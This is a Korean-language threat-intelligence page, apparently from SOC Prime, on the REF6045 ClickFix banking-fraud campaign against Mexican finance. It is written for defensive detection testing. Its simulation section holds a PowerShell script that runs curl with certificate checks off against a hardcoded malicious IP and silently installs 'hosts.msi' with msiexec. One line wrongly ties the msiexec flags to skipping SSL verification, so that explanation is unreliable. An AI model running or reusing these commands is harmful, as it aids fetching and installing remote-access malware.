SOC Prime Bias: 높음

08 Jul 2026 16:15 UTC

ClickFix에서 현금화까지: 멕시코 은행 사기 도구 세트 분석

Author Photo
SOC Prime Team linkedin icon 팔로우
ClickFix에서 현금화까지: 멕시코 은행 사기 도구 세트 분석
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

요약

REF6045는 멕시코 금융 부문을 대상으로 한 운영자 지원 은행 사기 캠페인입니다. 이것은 피해자를 악성 PowerShell 명령을 실행하도록 설득하기 위해 가짜 CAPTCHA 페이지를 사용하는 ClickFix 스타일의 전달 방법을 사용합니다. 감염 후 인적 운영자가 은행 세션을 관찰하고, 스크린샷을 캡처하며, 클립보드 내용을 변경하고, 완전한 원격 제어를 위해 Remote Utilities RAT을 배포할 수 있는 SCMBANKER 도구 키트를 제공합니다.

조사

Elastic Security Labs는 의심스러운 활동을 감지한 후 이 위협을 발견했습니다. bitsadmin 활동은 열린 디렉터리에서 PowerShell 스크립트를 다운로드하고 있었습니다. 조사는 공개적으로 접근 가능한 웹 루트 아카이브, zkt.zip를 통해 전체 도구 키트를 드러내었고, 명령 및 제어 인프라에서의 인증되지 않은 파일 편집기 및 열린 디렉터리를 포함하는 주요 운영 보안 약점을 드러냈습니다. 분석은 또한 도구 키트가 코드베이스에서 광범위한 AI 생성 아티팩트를 포함하고 있음을 보여주었습니다.

완화

조직은 PowerShell 및 bitsadmin 를 승인된 사용자에게만 제한하고 엄격한 실행 통제를 시행해야 합니다. 사용자는 가짜 CAPTCHA 프롬프트나 가짜 Windows 업데이트 화면과 같은 사회공학 공격을 식별할 수 있도록 교육받아야 합니다. 보안 팀은 또한 의심스러운 레지스트리 변경과 원격 액세스 소프트웨어의 무단 설치에 대한 강력한 모니터링을 배포해야 합니다.

대응

이 활동이 감지되면 지휘 및 제어 통신과 가능한 데이터 도난을 중지하기 위해 즉시 감염된 시스템을 격리하십시오. 침해 범위를 결정하기 위해 포렌식 조사를 수행하고 Remote Utilities 또는 무단 레지스트리 수정을 확인합니다. 감염된 기기에서 접근한 모든 금융 및 기타 민감한 계정의 비밀번호를 재설정하십시오.

공격 흐름

시뮬레이션 실행

전제조건: 텔레메트리 & 베이스라인 사전 비행 검사가 통과되어야 합니다.

이유: 이 섹션은 탐지 규칙을 트리거하기 위해 설계된 적대적 기술(TTP)의 정확한 실행을 세부적으로 설명합니다. 명령 및 스토리는 식별된 TTP를 직접 반영해야 하며 탐지 논리로 예상되는 정확한 텔레메트리를 생성해야 합니다. 추상적이거나 관련 없는 예시는 잘못된 진단을 초래할 수 있습니다.

  • 공격 설명 및 명령: 적은 REF6045 은행 사기 패턴을 모방하여 목표 시스템에 발판을 마련하려고 합니다. 먼저, 하드코딩된 악성 IP 주소 (68.211.161.46)에서 유효성 파일을 다운로드하려고 시도합니다. curl 을 사용하여 SSL 인증서를 검증하지 않기 위해 -k (비보안) 플래그를 사용합니다. 다운로드 후, 적은 악성 원격 액세스 도구를 msiexec.exe 을 사용하여 SSL 인증서를 검증하지 않기 위해 /i (설치) 및 /quiet (무음) 스위치를 사용하여 조용히 설치합니다. 이 파일은 hosts.msi로 명명된 파일을 대상으로 하며 사용자 상호 작용을 최소화하면서 지속적인 원격 액세스를 제공합니다.

  • 회귀 테스트 스크립트:

    # REF6045 TTPs에 대한 시뮬레이션 스크립트
    # 이 스크립트는 탐지 규칙에 정의된 특정 명령 줄을 모방합니다.
    
    $WorkDir = "$env:TEMPSimulation"
    if (!(Test-Path $WorkDir)) { New-Item -ItemType Directory -Path $WorkDir }
    Set-Location $WorkDir
    
    Write-Host "[+] 단계 1: curl을 통한 도구 전송 시뮬레이션 중..." -ForegroundColor Cyan
    # 참고: 실제 악성 트래픽을 피하기 위해 curl을 통한 가짜 파일 사용, 
    # 그러나 탐지에 필요한 정확한 명령 줄 문자열 유지.
    cmd /c curl -k https://68.211.161.46/validation.txt
    
    Write-Host "[+] 단계 2: MSI 무소음 설치 시뮬레이션 중..." -ForegroundColor Cyan
    # msiexec가 즉시 에러를 발생하지 않도록 더미 MSI 파일 생성 (그러나 규칙은 명령 줄에서 트리거됨)
    # DETECTION LOGIC (명령 줄)을 순수하게 테스트하기 위해 
    # 정확한 명령 문자열을 실행합니다.
    msiexec /i "hosts.msi" /quiet /norestart
  • 정리 명령:

    # 아티팩트 제거를 위한 정리 스크립트
    $WorkDir = "$env:TEMPSimulation"
    if (Test-Path $WorkDir) {
        Remove-Item -Recurse -Force $WorkDir
        Write-Host "[+] 정리 완료: $WorkDir 제거됨." -ForegroundColor Green
    } else {
        Write-Host "[!] 정리 건너뜀: 디렉터리를 찾을 수 없음." -ForegroundColor Yellow
    }